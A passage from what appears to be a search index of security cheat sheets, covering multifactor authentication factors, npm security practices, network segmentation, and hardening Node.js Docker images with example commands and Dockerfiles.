"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_7","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_7","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#email","title":"Email","text":"

Email verification requires that the user enters a code or clicks a link sent to their email address. There is some debate as to whether email constitutes a form of MFA, because if the user does not have MFA configured on their email account, it simply requires knowledge of the user's email password (which is often the same as their application password). However, it is included here for completeness.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_8","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_8","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#something-you-are","title":"Something You Are","text":"

The final factor in the traditional view of MFA is something you are - one of the physical attributes of the user (often called biometrics). Biometrics are rarely used in web applications due to the requirement for users to have specific hardware.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#biometrics","title":"Biometrics","text":"

There are a number of common types of biometrics that are used, including:

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_9","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_9","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#location","title":"Location","text":"

The use of location as a fourth factor for MFA is not fully accepted; however, it is increasingly being used for authentication. It is sometimes argued that location is merely used when deciding whether or not to require MFA (as discussed above); however, this is effectively the same as considering it to be a factor in its own right. Two prominent examples of this are the Conditional Access Policies available in Microsoft Azure, and the Network Unlock functionality in BitLocker.

When talking about location, the mere fact that the user can reach the application they are authenticating against is not usually considered a factor (as this is always the case, and as such is relatively meaningless).

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#source-ip-ranges","title":"Source IP Ranges","text":"

The source IP address the user is connecting from can be used as a factor, typically in an allow-list based approach. This could either be based on a static list (such as corporate office ranges) or a dynamic list (such as previous IP addresses the user has authenticated from).

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_10","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_10","title":"Cons","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#geolocation","title":"Geolocation","text":"

Rather than using the exact IP address of the user, the geographic location that the IP address is registered to can be used. This is less precise, but may be more feasible to implement in environments where IP addresses are not static. A common usage would be to require additional authentication factors when an authentication attempt is made from outside of the user's normal country.

"},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#pros_11","title":"Pros","text":""},{"location":"cheatsheets/Multifactor_Authentication_Cheat_Sheet.html#cons_11","title":"Cons","text":""},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html","title":"NPM Security best practices","text":"

In the following npm cheatsheet, we\u2019re going to focus on 10 npm security best practices and productivity tips, useful for JavaScript and Node.js developers.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#1-avoid-publishing-secrets-to-the-npm-registry","title":"1) Avoid publishing secrets to the npm registry","text":"

Whether you\u2019re making use of API keys, passwords or other secrets, they can very easily end up leaking into source control or even a published package on the public npm registry. You may have secrets in your working directory in designated files such as a .env file, which should be added to a .gitignore to avoid committing it to a SCM, but what happens when you publish an npm package from the project\u2019s directory?

The npm CLI packs up a project into a tar archive (tarball) in order to push it to the registry. The following criteria determine which files and directories are added to the tarball:

Developers may end up updating the .gitignore file, but forget to update .npmignore as well, which can lead to a potentially sensitive file not being pushed to source control, but still being included in the npm package.

Another good practice to adopt is making use of the files property in package.json, which works as a whitelist and specifies the array of files to be included in the package that is to be created and installed (while the ignore file functions as a blacklist). The files property and an ignore file can both be used together to determine which files should explicitly be included, as well as excluded, from the package. When using both, the files property in package.json takes precedence over the ignore file.
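
As an illustration, a package.json using the files whitelist might look like the snippet below (the package, file and directory names are purely illustrative):

{\n  \"name\": \"my-package\",\n  \"version\": \"1.0.0\",\n  \"files\": [\"dist\", \"lib\", \"index.js\"]\n}\n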

When a package is published, the npm CLI will verbosely display the archive being created. To be extra careful, add a --dry-run command-line argument to your publish command in order to first review how the tarball is created without actually publishing it to the registry.
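
For example, a dry run of the publish step looks like this:

$ npm publish --dry-run\n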

In January 2019, npm shared on their blog that they added a mechanism that automatically revokes a token if they detect that one has been published with a package.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#2-enforce-the-lockfile","title":"2) Enforce the lockfile","text":"

We embraced the birth of package lockfiles with open arms, which introduced: deterministic installations across different environments, and enforced dependency expectations across team collaboration. Life is good! Or so I thought\u2026 what would have happened had I slipped a change into the project\u2019s package.json file but had forgotten to commit the lockfile alongside it?

Both Yarn and npm act the same during dependency installation. When they detect an inconsistency between the project\u2019s package.json and the lockfile, they compensate for such a change based on the package.json manifest by installing different versions than those that were recorded in the lockfile.

This kind of situation can be hazardous for build and production environments as they could pull in unintended package versions and render the entire benefit of a lockfile futile.

Luckily, there is a way to tell both Yarn and npm to adhere to a specified set of dependencies and their versions by referencing them from the lockfile. Any inconsistency will abort the installation. The command-line should read as follows:
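
For npm this is done with npm ci, and for classic Yarn with the --frozen-lockfile flag:

$ npm ci\n$ yarn install --frozen-lockfile\n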

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#3-minimize-attack-surfaces-by-ignoring-run-scripts","title":"3) Minimize attack surfaces by ignoring run-scripts","text":"

The npm CLI works with package run-scripts. If you\u2019ve ever run npm start or npm test then you\u2019ve used package run-scripts too. The npm CLI builds on scripts that a package can declare, and allows packages to define scripts to run at specific entry points during the package\u2019s installation in a project. For example, some of these script hook entries may be postinstall scripts that a package being installed will execute in order to perform housekeeping chores.

With this capability, bad actors may create or alter packages to perform malicious acts by running any arbitrary command when their package is installed. A couple of cases where we\u2019ve seen this already happening is the popular eslint-scope incident that harvested npm tokens, and the crossenv incident, along with 36 other packages that abused a typosquatting attack on the npm registry.

Apply these npm security best practices in order to minimize the malicious module attack surface:
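
One widely recommended measure, shown here as an example, is to disable run-scripts during package installation, either per command or globally via the npm configuration:

$ npm install --ignore-scripts\n$ npm config set ignore-scripts true\n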

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#4-assess-npm-project-health","title":"4) Assess npm project health","text":""},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#npm-outdated-command","title":"npm outdated command","text":"

Rushing to constantly upgrade dependencies to their latest releases is not necessarily a good practice if it is done without reviewing release notes, the code changes, and generally testing new upgrades in a comprehensive manner. With that said, staying out of date and not upgrading at all, or after a long time, is a source for trouble as well.

The npm CLI can provide information about the freshness of dependencies you use with regard to their semantic versioning offset. By running npm outdated, you can see which packages are out of date. Dependencies in yellow correspond to the semantic versioning as specified in the package.json manifest, and dependencies colored in red mean that there\u2019s an update available. Furthermore, the output also shows the latest version for each dependency.
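
An illustrative run might look like the following (the package name and versions are made up for this example):

$ npm outdated\nPackage      Current  Wanted  Latest  Location\nexample-lib    1.0.1   1.0.3   2.1.0  my-app\n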

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#npm-doctor-command","title":"npm doctor command","text":"

Between the variety of Node.js package managers, and different versions of Node.js you may have installed in your path, how do you verify a healthy npm installation and working environment? Whether you\u2019re working with the npm CLI in a development environment or within a CI, it is important to assess that everything is working as expected.

Call the doctor! The npm CLI incorporates a health assessment tool to diagnose your environment for a well-working npm interaction. Run npm doctor to review your npm setup:
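
Among other things, it verifies that the configured registry is reachable, that the node and npm versions in use are reasonable, that git is available, and that the local package cache is intact:

$ npm doctor\n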

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#5-audit-for-vulnerabilities-in-open-source-dependencies","title":"5) Audit for vulnerabilities in open source dependencies","text":"

The npm ecosystem is the single largest repository of application libraries amongst all the other language ecosystems. The registry and the libraries in it are at the core for JavaScript developers as they are able to leverage work that others have already built and incorporate it into their codebase. With that said, the increasing adoption of open source libraries in applications brings with it an increased risk of introducing security vulnerabilities.

Many popular npm packages have been found to be vulnerable and may carry a significant risk without proper security auditing of your project\u2019s dependencies. Some examples are npm request, superagent, mongoose, and even security-related packages like jsonwebtoken, and validator.

Security doesn\u2019t end with just scanning for security vulnerabilities when installing a package; it should also be streamlined into developer workflows to be effectively adopted throughout the entire lifecycle of software development, and monitored continuously when code is deployed:
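
As a starting point, the npm CLI ships with a built-in audit: npm audit reports known vulnerabilities in the installed dependency tree, and npm audit fix attempts to upgrade affected packages within the allowed semver ranges:

$ npm audit\n$ npm audit fix\n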

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#6-use-a-local-npm-proxy","title":"6) Use a local npm proxy","text":"

The npm registry is the biggest collection of packages that is available for all JavaScript developers and is also the home of most of the Open Source projects for web developers. But sometimes you might have different needs in terms of security, deployments or performance. When this is true, npm allows you to switch to a different registry:

When you run npm install, it automatically communicates with the main registry to resolve all your dependencies; if you wish to use a different registry, that too is pretty straightforward:
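
For example, the registry can be switched globally with npm config, or passed per command with the --registry flag (the URL below is a placeholder):

$ npm config set registry https://registry.example.com/\n$ npm install --registry=https://registry.example.com/\n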

Verdaccio is a simple lightweight zero-config-required private registry and installing it is as simple as follows: $ npm install --global verdaccio.

Hosting your own registry was never so easy! Let\u2019s check the most important features of this tool:

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#7-responsibly-disclose-security-vulnerabilities","title":"7) Responsibly disclose security vulnerabilities","text":"

When security vulnerabilities are found, they pose a potentially serious threat if publicly disclosed without prior warning or appropriate mitigation available for users to protect themselves.

It is recommended that security researchers follow a responsible disclosure program, which is a set of processes and guidelines that aims to connect the researchers with the vendor or maintainer of the vulnerable asset, in order to convey the vulnerability, its impact and applicability. Once the vulnerability is correctly triaged, the vendor and researcher coordinate a fix and a publication date for the vulnerability in an effort to provide an upgrade-path or remediation for affected users before the security issue is made public.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#8-enable-2fa","title":"8) Enable 2FA","text":"

In October 2017, npm officially announced support for two-factor authentication (2FA) for developers using the npm registry to host their closed and open source packages.

Even though 2FA has been supported on the npm registry for a while now, it seems to be slowly adopted, with one example being the eslint-scope incident in mid-2018, when a stolen developer account on the ESLint team led to a malicious version of eslint-scope being published by bad actors.

Enabling 2FA is an easy and significant win for npm security best practices. The registry supports two modes for enabling 2FA in a user\u2019s account:

Equip yourself with an authenticator application, such as Google Authenticator, which you can install on a mobile device, and you\u2019re ready to get started. One easy way to enable the 2FA extended protection for your account is through npm\u2019s user interface, which allows enabling it very easily. If you\u2019re a command-line person, it\u2019s also easy to enable 2FA when using a supported npm client version (>=5.5.1):

npm profile enable-2fa auth-and-writes\n

Follow the command-line instructions to enable 2FA, and to save emergency authentication codes. If you wish to enable 2FA mode for login and profile changes only, you may replace the auth-and-writes with auth-only in the code as it appears above.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#9-use-npm-author-tokens","title":"9) Use npm author tokens","text":"

Every time you log in with the npm CLI, a token is generated for your user and authenticates you to the npm registry. Tokens make it easy to perform npm registry-related actions during CI and automated procedures, such as accessing private modules on the registry or publishing new versions from a build step.

Tokens can be managed through the npm registry website, as well as using the npm command-line client. An example of using the CLI to create a read-only token that is restricted to a specific IPv4 address range is as follows:

npm token create --read-only --cidr=192.0.2.0/24\n

To verify which tokens are created for your user or to revoke tokens in cases of emergency, you can use npm token list or npm token revoke respectively.
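
For example (the token identifier below is a placeholder):

$ npm token list\n$ npm token revoke <token_id>\n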

Ensure you are following this npm security best practice by protecting and minimizing the exposure of your npm tokens.

"},{"location":"cheatsheets/NPM_Security_Cheat_Sheet.html#10-understand-module-naming-conventions-and-typosquatting-attacks","title":"10) Understand module naming conventions and typosquatting attacks","text":"

Naming a module is the first thing you might do when creating a package, but before you settle on a final name, note that npm defines some rules that a package name must follow:

Typosquatting is an attack that relies on mistakes made by users, such as typos. With typosquatting, bad actors could publish malicious modules to the npm registry with names that look much like existing popular modules.

We have been tracking tens of malicious packages in the npm ecosystem; they have been seen on the PyPi Python registry as well. Perhaps some of the most popular incidents have been for cross-env, event-stream, and eslint-scope.

One of the main targets for typosquatting attacks is user credentials, since any package has access to environment variables via the global variable process.env. Other examples we\u2019ve seen in the past include the case with event-stream, where the attack targeted developers in the hopes of injecting malicious code into an application\u2019s source code.

Closing our list of ten npm security best practices are the following tips to reduce the risk of such attacks:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html","title":"Network segmentation Cheat Sheet","text":""},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Network segmentation is the core of multi-layer defense in depth for modern services. Segmentation slows down an attacker by preventing them from carrying out attacks such as:

The main goal of this cheat sheet is to show the basics of network segmentation to effectively counter attacks by building a secure and maximally isolated service network architecture.

Segmentation will avoid the following situations:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#content","title":"Content","text":""},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#schematic-symbols","title":"Schematic symbols","text":"

Elements used in network diagrams:

Crossing the border of the rectangle means crossing the firewall:

In the image above, traffic passes through two firewalls named FW1 and FW2.

In the image above, traffic passes through one firewall, behind which there are two VLANs.

In the following diagrams, firewall icons are omitted so as not to clutter the schemes.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#three-layer-network-architecture","title":"Three-layer network architecture","text":"

By default, developed information systems should consist of at least three components (security zones):

  1. FRONTEND;
  2. MIDDLEWARE;
  3. BACKEND.
"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#frontend","title":"FRONTEND","text":"

FRONTEND - A frontend is a set of segments with the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#middleware","title":"MIDDLEWARE","text":"

MIDDLEWARE - a set of segments to accommodate the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#backend","title":"BACKEND","text":"

BACKEND - a set of network segments to accommodate the following network elements:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#example-of-three-layer-network-architecture","title":"Example of Three-layer network architecture","text":"

The following example shows an organization's local network. The organization is called \"Contoso\".

The edge firewall contains 2 VLANs of the FRONTEND security zone:

The internal firewall contains 4 VLANs:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#interservice-interaction","title":"Interservice interaction","text":"

Usually, some of the company's information systems interact with each other. It is important to define a firewall policy for such interactions. The basic allowed interactions are indicated by the green arrows in the image below. The image also shows the allowed access from the FRONTEND and MIDDLEWARE segments to external networks (the Internet, for example).

From this image, it follows that:

  1. Access between FRONTEND and MIDDLEWARE segments of different information systems is prohibited;
  2. Access from the MIDDLEWARE segment to the BACKEND segment of another service is prohibited (access to a foreign database bypassing the application server is prohibited).

Forbidden accesses are indicated by red arrows in the image below:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#many-applications-on-the-same-network","title":"Many applications on the same network","text":"

If you prefer to have fewer networks in your organization and host more applications on each network, it is acceptable to host the load balancer on those networks. This balancer will balance traffic to applications on the network. In this case, it will be necessary to open one port to such a network, and balancing will be performed, for example, based on the HTTP request parameters. An example of such segmentation:

As you can see, there is only one incoming access to each network: access is opened only up to the balancer in the network. However, in this case segmentation no longer fully applies; access control between applications from different network segments is performed at layer 7 of the OSI model by the balancer.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#network-security-policy","title":"Network security policy","text":"

The organization must define a \"paper\" policy that describes the firewall rules and the basic allowed network access. This policy is useful, at a minimum, for:

It is convenient when the policy is described with similar images, with the information presented as concisely and simply as possible.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#examples-of-individual-policy-provisions","title":"Examples of individual policy provisions","text":"

Examples in the network policy will help colleagues quickly understand what access is potentially allowed and can be requested.

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#permissions-for-cicd","title":"Permissions for CI/CD","text":"

The network security policy may define, for example, the basic permissions allowed for the software development system. Let's look at an example of what such a policy might look like:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#secure-logging","title":"Secure logging","text":"

It is important that, in the event of a compromise of any information system, its logs cannot subsequently be modified by an attacker. To achieve this, copy the logs to a separate server, for example using the syslog protocol; syslog does not allow an attacker to modify existing log entries, it only allows new events to be appended to the logs. The network security policy for this activity looks like this: in this example, we are also talking about application logs that may contain security events, as well as potentially important events that may indicate an attack.
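
As a sketch, assuming rsyslog is used on the application server, forwarding a copy of every event to a dedicated log host (the hostname below is a placeholder) can be configured with a single rule:

# /etc/rsyslog.d/forward.conf - send a copy of all events to the central log server over TCP\n*.* @@loghost.example.internal:514\n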

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#permissions-for-monitoring-systems","title":"Permissions for monitoring systems","text":"

Suppose a company uses Zabbix as an IT monitoring system. In this case, the policy might look like this:

"},{"location":"cheatsheets/Network_Segmentation_Cheat_Sheet.html#useful-links","title":"Useful links","text":""},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html","title":"Node.js Docker Cheat Sheet","text":"

The following cheatsheet provides production-grade guidelines for building optimized and secure Node.js Docker images. You\u2019ll find it helpful regardless of the Node.js application you aim to build. This article will be helpful for you if:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#1-use-explicit-and-deterministic-docker-base-image-tags","title":"1) Use explicit and deterministic Docker base image tags","text":"

It may seem an obvious choice to build your image based on the node Docker image, but what are you actually pulling in when you build the image? Docker images are always referenced by tags, and when you don\u2019t specify a tag, the default :latest tag is used.

So, in fact, by specifying the following in your Dockerfile, you always build the latest version of the Docker image that has been built by the Node.js Docker working group:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#from-node","title":"FROM node","text":"

The shortcomings of building based on the default node image are as follows:

  1. Docker image builds are inconsistent. Just like we\u2019re using lockfiles to get a deterministic npm install behavior every time we install npm packages, we\u2019d also like to get deterministic docker image builds. If we build the image from node\u2014which effectively means the node:latest tag\u2014then every build will pull a newly built Docker image of node. We don\u2019t want to introduce this sort of non-deterministic behavior.
  2. The node Docker image is based on a full-fledged operating system, full of libraries and tools that you may or may not need to run your Node.js web application. This has two downsides. Firstly a bigger image means a bigger download size which, besides increasing the storage requirement, means more time to download and re-build the image. Secondly, it means you\u2019re potentially introducing security vulnerabilities, that may exist in all of these libraries and tools, into the image.

In fact, the node Docker image is quite big and includes hundreds of security vulnerabilities of different types and severities. If you\u2019re using it, then by default your starting point is going to be a baseline of 642 security vulnerabilities, and hundreds of megabytes of image data that is downloaded on every pull and build.

The recommendations for building better Docker images are:

  1. Use small Docker images\u2014this will translate to a smaller software footprint on the Docker image reducing the potential vulnerability vectors, and a smaller size, which will speed up the image build process
  2. Use the Docker image digest, which is the static SHA256 hash of the image. This ensures that you are getting deterministic Docker image builds from the base image.

Based on this, let\u2019s ensure that we use the Long Term Support (LTS) version of Node.js, and the minimal alpine image type to have the smallest size and software footprint on the image:

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#from-nodelts-alpine","title":"FROM node:lts-alpine","text":"

Nonetheless, this base image directive will still pull new builds of that tag. We can find the SHA256 hash for it on Docker Hub for this Node.js tag, or by running the following command once we have pulled this image locally, and locating the Digest field in the output:

$ docker pull node:lts-alpine\nlts-alpine: Pulling from library/node\n0a6724ff3fcd: Already exists\n9383f33fa9f3: Already exists\nb6ae88d676fe: Already exists\n565e01e00588: Already exists\nDigest: sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nStatus: Downloaded newer image for node:lts-alpine\ndocker.io/library/node:lts-alpine\n

Another way to find the SHA256 hash is by running the following command:

$ docker images --digests\nREPOSITORY                     TAG              DIGEST                                                                    IMAGE ID       CREATED             SIZE\nnode                           lts-alpine       sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a   51d926a5599d   2 weeks ago         116MB\n

Now we can update the Dockerfile for this Node.js Docker image as follows:

FROM node@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n

However, the Dockerfile above only specifies the Node.js Docker image name without an image tag, which creates ambiguity about which exact image tag is being used\u2014it\u2019s not readable, is hard to maintain, and doesn\u2019t create a good developer experience.

Let\u2019s fix it by updating the Dockerfile, providing the full base image tag for the Node.js version that corresponds to that SHA256 hash:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm install\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#2-install-only-production-dependencies-in-the-nodejs-docker-image","title":"2) Install only production dependencies in the Node.js Docker image","text":"

The following Dockerfile directive installs all dependencies in the container, including devDependencies, which aren\u2019t needed for a functional application to work. It adds an unneeded security risk from packages used as development dependencies, as well as inflating the image size unnecessarily.

RUN npm install

Enforce deterministic builds with npm ci. This prevents surprises in a continuous integration (CI) flow because it halts if any deviations from the lockfile are made.

In the case of building a Docker image for production we want to ensure that we only install production dependencies in a deterministic way, and this brings us to the following recommendation for the best practice for installing npm dependencies in a container image:

RUN npm ci --only=production

The updated Dockerfile contents in this stage are as follows:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm ci --only=production\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#3-optimize-nodejs-tooling-for-production","title":"3) Optimize Node.js tooling for production","text":"

When you build your Node.js Docker image for production, you want to ensure that all frameworks and libraries are using the optimal settings for performance and security.

This brings us to add the following Dockerfile directive:

ENV NODE_ENV production

At first glance, this looks redundant, since we already specified only production dependencies in the npm install phase\u2014so why is this necessary?

Developers mostly associate the NODE_ENV=production environment variable setting with the installation of production-related dependencies, however, this setting also has other effects which we need to be aware of.

Some frameworks and libraries may only turn on the optimized configuration that is suited to production if that NODE_ENV environment variable is set to production. Putting aside our opinion on whether this is a good or bad practice for frameworks to take, it is important to know this.

As an example, the Express documentation outlines the importance of setting this environment variable for enabling performance and security related optimizations:

The performance impact of the NODE_ENV variable could be very significant.

Many of the other libraries that you are relying on may also expect this variable to be set, so we should set this in our Dockerfile.

The updated Dockerfile should now read as follows with the NODE_ENV environment variable setting baked in:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY . /usr/src/app\nRUN npm ci --only=production\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#4-dont-run-containers-as-root","title":"4) Don\u2019t run containers as root","text":"

The principle of least privilege is a long-time security control from the early days of Unix and we should always follow this when we\u2019re running our containerized Node.js web applications.

The threat assessment is pretty straightforward\u2014if an attacker is able to compromise the web application in a way that allows for command injection or directory path traversal, then these will be invoked with the user who owns the application process. If that process happens to be root, then they can do virtually everything within the container, including attempting a container escape or privilege escalation. Why would we want to risk it? You\u2019re right, we don\u2019t.

Repeat after me: \u201cfriends don\u2019t let friends run containers as root!\u201d

The official node Docker image, as well as its variants like alpine, include a least-privileged user of the same name: node. However, it\u2019s not enough to just run the process as node. For example, the following might not be ideal for an application to function well:

USER node\nCMD \"npm\" \"start\"\n

The reason for that is the USER Dockerfile directive only ensures that the process is owned by the node user. What about all the files we copied earlier with the COPY instruction? They are owned by root. That\u2019s how Docker works by default.

The complete and proper way of dropping privileges is as follows, also showing our up to date Dockerfile practices up to this point:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY --chown=node:node . /usr/src/app\nRUN npm ci --only=production\nUSER node\nCMD \"npm\" \"start\"\n
"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#5-properly-handle-events-to-safely-terminate-a-nodejs-docker-web-application","title":"5) Properly handle events to safely terminate a Node.js Docker web application","text":"

One of the most common mistakes I see in blogs and articles about containerizing Node.js applications is the way that they invoke the process. All of the following and their variants are bad patterns you should avoid:

Let\u2019s dig in! I\u2019ll walk you through the differences between them and why they\u2019re all patterns to avoid.

The following concerns are key to understanding the context for properly running and terminating Node.js Docker applications:

  1. An orchestration engine, such as Docker Swarm, Kubernetes, or even just Docker engine itself, needs a way to send signals to the process in the container. Mostly, these are signals to terminate an application, such as SIGTERM and SIGKILL.
  2. The process may run indirectly, and if that happens then it\u2019s not always guaranteed that it will receive these signals.
  3. The Linux kernel treats processes that run as process ID 1 (PID 1) differently than any other process ID.

Equipped with that knowledge, let\u2019s begin investigating the ways of invoking the process for a container, starting off with the example from the Dockerfile we\u2019re building:

CMD \"npm\" \"start\"

The caveat here is twofold. Firstly, we\u2019re indirectly running the node application by directly invoking the npm client. Who\u2019s to say that the npm CLI forwards all signals to the node runtime? It actually doesn\u2019t, and we can easily test that.

Make sure that in your Node.js application you set an event handler for the SIGHUP signal which logs to the console every time you\u2019re sending an event. A simple code example should look as follows:

function handle(signal) {\n   console.log(`*^!@4=> Received event: ${signal}`)\n}\nprocess.on('SIGHUP', handle)\n

Then run the container, and once it\u2019s up specifically send it the SIGHUP signal using the docker CLI and the special --signal command-line flag:

$ docker kill --signal=SIGHUP elastic_archimedes

Nothing happened, right? That\u2019s because the npm client doesn\u2019t forward any signals to the node process that it spawned.

The other caveat has to do with the different ways in which you can specify the CMD directive in the Dockerfile. There are two ways, and they are not the same:

  1. the shell form notation, in which the container spawns a shell interpreter that wraps the process. In such cases, the shell may not properly forward signals to your process.
  2. the exec form notation, which directly spawns a process without wrapping it in a shell. It is specified using the JSON array notation, such as: CMD [\u201cnpm\u201d, \u201cstart\u201d]. Any signals sent to the container are sent directly to the process.

Based on that knowledge, we want to improve our Dockerfile process execution directive as follows:

CMD [\"node\", \"server.js\"]

We are now invoking the node process directly, ensuring that it receives all of the signals sent to it, without it being wrapped in a shell interpreter.

However, this introduces another pitfall.

When processes run as PID 1 they effectively take on some of the responsibilities of an init system, which is typically responsible for initializing an operating system and processes. The kernel treats PID 1 in a different way than it treats other process identifiers. This special treatment from the kernel means that the handling of a SIGTERM signal to a running process won\u2019t invoke a default fallback behavior of killing the process if the process doesn\u2019t already set a handler for it.

To quote the Node.js Docker working group recommendation on this:\u00a0 \u201cNode.js was not designed to run as PID 1 which leads to unexpected behaviour when running inside of Docker. For example, a Node.js process running as PID 1 will not respond to SIGINT (CTRL-C) and similar signals\u201d.

The way to go about it, then, is to use a tool that acts like an init process: it is invoked with PID 1 and then spawns our Node.js application as another process, whilst ensuring that all signals are proxied to that Node.js process. If possible, we\u2019d like as small a tooling footprint as possible for doing so, in order not to risk having security vulnerabilities added to our container image.

One such tool is dumb-init which is statically linked and has a small footprint. Here\u2019s how we\u2019ll set it up:

RUN apk add dumb-init\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

This brings us to the following up to date Dockerfile. You\u2019ll notice that we placed the dumb-init package install right after the image declaration, so we can take advantage of Docker\u2019s caching of layers:

FROM node:lts-alpine@sha256:b2da3316acdc2bec442190a1fe10dc094e7ba4121d029cb32075ff59bb27390a\nRUN apk add dumb-init\nENV NODE_ENV production\nWORKDIR /usr/src/app\nCOPY --chown=node:node . .\nRUN npm ci --only=production\nUSER node\nCMD [\"dumb-init\", \"node\", \"server.js\"]\n

Good to know: docker kill and docker stop commands only send signals to the container process with PID 1. If you\u2019re running a shell script that runs your Node.js application, then take note that a shell instance\u2014such as /bin/sh, for example\u2014doesn\u2019t forward signals to child processes, which means your app will never get a SIGTERM.

"},{"location":"cheatsheets/NodeJS_Docker_Cheat_Sheet.html#6-graceful-tear-down-for-your-nodejs-web-applications","title":"6) Graceful tear down for your Node.js web applications","text":"

If we\u2019re already discussing process signals that terminate applications, let\u2019s make sure we\u2019re shutting them down properly and gracefully without disrupting users.

When a Node.js application receives an interrupt signal, also known as SIGINT, or CTRL+C, it will cause an abrupt process kill, unless, of course, event handlers were set to handle it differently. This means that clients connected to the web application will be immediately disconnected. Now, imagine hundreds of Node.js web containers orchestrated by Kubernetes, going up and down as needs arise to scale or manage errors. Not the greatest user experience.

You can easily simulate this problem. Here\u2019s a stock Fastify web application example, with an inherent delayed response of 60 seconds for an endpoint:

const fastify = require('fastify')({ logger: true })\n\n// Assumed listener values for this example; the curl command below targets port 3000\nconst HOST = '0.0.0.0'\nconst PORT = 3000\n\nfastify.get('/delayed', async (request, reply) => {\n const SECONDS_DELAY = 60000\n await new Promise(resolve => {\n     setTimeout(() => resolve(), SECONDS_DELAY)\n })\n return { hello: 'delayed world' }\n})\n\nconst start = async () => {\n try {\n   await fastify.listen(PORT, HOST)\n   console.log(`*^!@4=> Process id: ${process.pid}`)\n } catch (err) {\n   fastify.log.error(err)\n   process.exit(1)\n }\n}\n\nstart()\n

Run this application and once it\u2019s running send a simple HTTP request to this endpoint:

$ time curl http://localhost:3000/delayed

Hit CTRL+C in the running Node.js console window and you\u2019ll see that the curl request exited abruptly. This simulates the same experience your users would receive when containers tear down.

To provide a better experience, we can do the following:

  1. Set an event handler for the various termination signals like SIGINT and SIGTERM.
  2. The handler waits for clean up operations like database connections, ongoing HTTP requests and others.
  3. The handler then terminates the Node.js process.

Specifically with Fastify, we can have our handler call on fastify.close() which returns a promise that we will await, and Fastify will also take care to respond to every new connection with the HTTP status code 503 to signal that the application is unavailable.

Let\u2019s add our event handler:

